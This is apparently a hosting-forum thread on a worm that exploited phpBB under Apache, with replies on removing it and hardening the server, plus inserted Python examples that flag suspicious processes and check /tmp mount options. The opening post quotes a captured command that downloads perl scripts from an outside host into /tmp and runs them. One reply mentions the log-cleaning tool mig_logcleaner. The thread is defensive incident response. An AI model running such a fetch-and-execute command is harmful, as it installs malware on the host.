Worm problem with apache 2.0.8

trec

New Pleskian
I am having some strange processes:

apache 610 0.3 0.0 5320 1096 ? S 02:13 0:00 sh -c cd /tmp;wget www.visualcoders.net/spybot.txt;wget www.visualcoders.net/worm1.txt;wget www.visualcoders.net/php.txt;wget www.visualcoders.net/ownz.txt;wget www.visualcoders.net/zone.txt;perl spybot.txt;perl worm1.txt;perl ownz.txt;perl php.txt
apache 611 0.3 0.0 6716 1608 ? S 02:13 0:00 wget www.visualcoders.net/spybot.txt
apache 619 0.0 0.1 8232 3680 ? S 02:13 0:00 /usr/local/sbin/httpd - spy

and there are several of the last one: httpd - spy

It seems to be a worm; in /tmp there are several .txt files.

any clue on how to remove it?
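As an added example (not part of trec's post or of any reply in this thread): a small Python script that parses `ps aux`-style output and flags the patterns visible in the listing above, so the offending PIDs can be listed before killing anything. The sample listing is constructed for the example; its three apache lines with PIDs 610, 611 and 619 are the ones quoted above, the other rows are made-up ordinary processes. The set of web-server account names and the httpd path are assumptions.

```python
import re
from collections import namedtuple

Proc = namedtuple("Proc", "user pid cmd")

# Constructed sample in `ps aux` layout. PIDs 610, 611 and 619 are the lines quoted
# in the post; the remaining rows are ordinary processes added for contrast.
SAMPLE_PS = """\
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.0 1520 520 ? S 01:00 0:00 init
root 590 0.0 0.1 8200 3500 ? S 02:10 0:00 /usr/local/sbin/httpd
apache 598 0.0 0.1 8232 3600 ? S 02:10 0:00 /usr/local/sbin/httpd
apache 599 0.0 0.1 8232 3600 ? S 02:10 0:00 /usr/local/sbin/httpd
apache 610 0.3 0.0 5320 1096 ? S 02:13 0:00 sh -c cd /tmp;wget www.visualcoders.net/spybot.txt;wget www.visualcoders.net/worm1.txt;wget www.visualcoders.net/php.txt;wget www.visualcoders.net/ownz.txt;wget www.visualcoders.net/zone.txt;perl spybot.txt;perl worm1.txt;perl ownz.txt;perl php.txt
apache 611 0.3 0.0 6716 1608 ? S 02:13 0:00 wget www.visualcoders.net/spybot.txt
apache 619 0.0 0.1 8232 3680 ? S 02:13 0:00 /usr/local/sbin/httpd - spy
postfix 700 0.0 0.0 3000 900 ? S 02:00 0:00 qmgr -l -t fifo -u
"""

# Assumption: the accounts the web server's worker processes run as.
WEB_USERS = {"apache", "www-data", "nobody"}


def parse_ps(text):
    """Parse `ps aux` output into Proc records; the command is everything after column 10."""
    procs = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("USER"):
            continue
        fields = line.split(None, 10)
        if len(fields) < 11:
            continue
        procs.append(Proc(fields[0], int(fields[1]), fields[10]))
    return procs


def find_suspicious(procs):
    """Return {pid: [reasons]} for web-server-owned processes that match the worm's
    behaviour: a shell working in /tmp, a downloader, an interpreter fed a .txt file,
    or an httpd whose argv differs from the root master's (prefork workers inherit it)."""
    master_cmd = next(
        (p.cmd for p in procs if p.user == "root" and p.cmd.split()[0].endswith("/httpd")),
        None,
    )
    findings = {}
    for p in procs:
        if p.user not in WEB_USERS:
            continue
        reasons = []
        argv0 = p.cmd.split()[0]
        if re.search(r"\bcd\s+/tmp\b", p.cmd):
            reasons.append("shell changes into /tmp")
        if re.match(r"(?:\S*/)?(wget|curl|lynx)\b", p.cmd):
            reasons.append("downloader started by web-server user")
        if re.search(r"\bperl\s+\S+\.txt\b", p.cmd):
            reasons.append("perl run on a .txt file")
        if argv0.endswith("/httpd") and master_cmd is not None and p.cmd != master_cmd:
            reasons.append("httpd argv differs from master (%r)" % master_cmd)
        if reasons:
            findings[p.pid] = reasons
    return findings


if __name__ == "__main__":
    for pid, reasons in sorted(find_suspicious(parse_ps(SAMPLE_PS)).items()):
        print(pid, "; ".join(reasons))
```

To run it against a live box, feed the real `ps aux` output into `parse_ps` instead of `SAMPLE_PS`. The argv comparison is the useful part: a worker that has rewritten its own command line to look like httpd still differs from what the root master process was started with, even when there are "several of the last one" and the fakes outnumber the genuine workers.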
 
Seems to be Santy. Are you running phpBB?

You have to kill all httpd processes and restart apache. Remove all files in /tmp

Upgrade phpbb to the latest version. Upgrade php (plesk 7.5.1) to be sure to have many security bugs fixed.
 
Thanks ptheborg and Ivalics, thanks for the info, that's precisely the worm I have. The problem is I have several sites using phpBB (about 7) and others using PHPNuke, so disabling phpBB or PHP applications is not an option for me right now.

How can I secure the /tmp folder to not be executable?
Would this affect any other software or function?

I will be upgrading to Plesk 7.5.1 later today and also would like to make the correct changes on /tmp
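As an added example (not part of this post or of any reply in the thread): a Python check of the /tmp mount options, with a weak fstab line beside the hardened one. The fstab lines are constructed for the example; the device name and filesystem type are assumptions. The same parser works on /proc/mounts output, since the mount point and option field sit in the same columns.

```python
# Constructed fstab fragments: /tmp as an ordinary partition (weak) and the same
# partition with the hardening options added. Device and fs type are assumptions.
FSTAB_WEAK = """\
/dev/sda1  /     ext3  defaults  1 1
/dev/sda3  /tmp  ext3  defaults  1 2
"""
FSTAB_HARDENED = """\
/dev/sda1  /     ext3  defaults                    1 1
/dev/sda3  /tmp  ext3  defaults,noexec,nosuid,nodev  1 2
"""

# Options a world-writable scratch filesystem should carry.
REQUIRED = ("noexec", "nosuid", "nodev")


def mount_options(table, mountpoint):
    """Return the option set of `mountpoint` from fstab or /proc/mounts text,
    or None if it is not a separate mount."""
    for line in table.splitlines():
        fields = line.split()
        if len(fields) >= 4 and not fields[0].startswith("#") and fields[1] == mountpoint:
            return set(fields[3].split(","))
    return None


def missing_hardening(table, mountpoint="/tmp"):
    """Options from REQUIRED that `mountpoint` lacks. None means the directory is not
    its own filesystem, so mount options cannot be applied to it at all."""
    opts = mount_options(table, mountpoint)
    if opts is None:
        return None
    return sorted(o for o in REQUIRED if o not in opts)


def harden_fstab_line(line):
    """Return an fstab line with the missing hardening options appended to its option field."""
    fields = line.split()
    opts = fields[3].split(",")
    opts += [o for o in REQUIRED if o not in opts]
    fields[3] = ",".join(opts)
    return "  ".join(fields)


if __name__ == "__main__":
    print("weak:    ", missing_hardening(FSTAB_WEAK))       # ['nodev', 'noexec', 'nosuid']
    print("hardened:", missing_hardening(FSTAB_HARDENED))   # []
    print(harden_fstab_line("/dev/sda3  /tmp  ext3  defaults  1 2"))
```

After editing /etc/fstab, `mount -o remount /tmp` applies the options to the running system. Two caveats worth knowing before answering "would this affect any other software": noexec stops binaries and scripts in /tmp from being run directly, which breaks any installer or build that unpacks and executes from /tmp, and it does not stop `perl spybot.txt` of the kind shown in the listing, because there the interpreter is what executes and it only reads the file. If /tmp is just a directory on the root filesystem, `missing_hardening` returns None; it has to become its own mount (a partition, tmpfs or loop-mounted file) before any of this applies.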
 
Has anyone figured out how to completely stop these intrusions?

I've upgraded PHP to 4.3.10, upgraded all phpBBs on my server to 2.0.11, and followed most of the steps (i.e. securing /tmp and renaming wget) that lvalics detailed on his site. (Thanks lvalics)

Still, every few hours my /tmp is full of random files that contain perl scripts or lists of phpBB sites that someone is scanning for using my server.

I've searched through google.com and I can't figure out what I am missing. How are they still getting in?
 
Checked into mod_security yet?
Short of a complete reimage of the server, about all you can do is ensure that commands that can exploit the PHP bug cannot be executed at all.
 
Sounds bad.
It can be, for example, that the attacker is already in the system. Then it will be hard to kick him out, or almost impossible, and maybe (only maybe) it will require a full reinstall.
There are several ways to find out if they are inside, but it is too long to write down here. I will try to point out some ideas, but whether you can fight against it or not depends on your Linux skill.

1. If a BNC is already installed, or some other program, and he is already a root user, I suggest acting like you don't know about him for 1-2 days, and doing a backup and saving it somewhere on another server (psadump). This is in case he observes you and tries to delete things and the server crashes; you need a full backup.

2. Try to see what scripts he installs and how each script acts, where it installs itself. It is not easy, because if this user is smart then it is hard to find out; he deletes all logs, all clues.
We have a program that we use to hide ourselves in these cases, and we stay alerted when he logs in, to watch what he does.
This small perl script, mig_logcleaner (which he probably uses as well, or something similar), will hide you so he cannot see that you are logged in, and he will work like no one is on the server.
You can watch what he does (reading root or user bash history before he deletes it).

3. Try to install chkrootkit (only after you have done point 1, full backup) and try to find the worm.

4. Try to run different commands like ps or netstat and see if you can find any anomalies in the processes; for example, with netstat you can see something like port - or port 6 used, or things that are not normal.
It is not easy to find them.

5. The last thing is to reinstall the OS (clean install) and restore PLESK.

If you are not hacked already then you need to find out where, in which apache log, he tries to write.
You can try to use tcpdump to see where these attacks come from; you can also try to look at the apache logs, but it is almost impossible to see it all if you have over 10 domains.

Maybe a nice idea for PLESK: not to log only to the directory of each user, but to log also for the admin in one log for all domains. I don't know if it's possible, but as Admin I always like to have the possibility to see the log for all domains in one file to look where a problem can be, instead of searching in all of them ...

Hope this helps.
 
It may not fix all the holes, but take a look at

http://eth0.us

He has posted a mod_security how-to that blocks some issues with phpBB, allowing you to keep phpBB on your servers. It may not be the most complete ruleset, but it works! I have tested it on my test box and production box and it works.

regards,
 
Hi,

AFAIK the worm does not work if PHP safe_mode is activated ...

Did you activate PHP safe_mode globally?

Regards,

Bobby
 
wget

I didn't read this entire forum, but this issue was spoken about in another thread:
http://forum.plesk.com/showthread.php?s=&postid=91894

The easiest and quickest way to prevent sites from downloading the trojans is to simply rename your wget command to something else. Then they won't be able to use this command at all and cannot download the trojans.

This worked for me, but of course it is not a definitive solution. It just saves you a lot of trouble right away.
 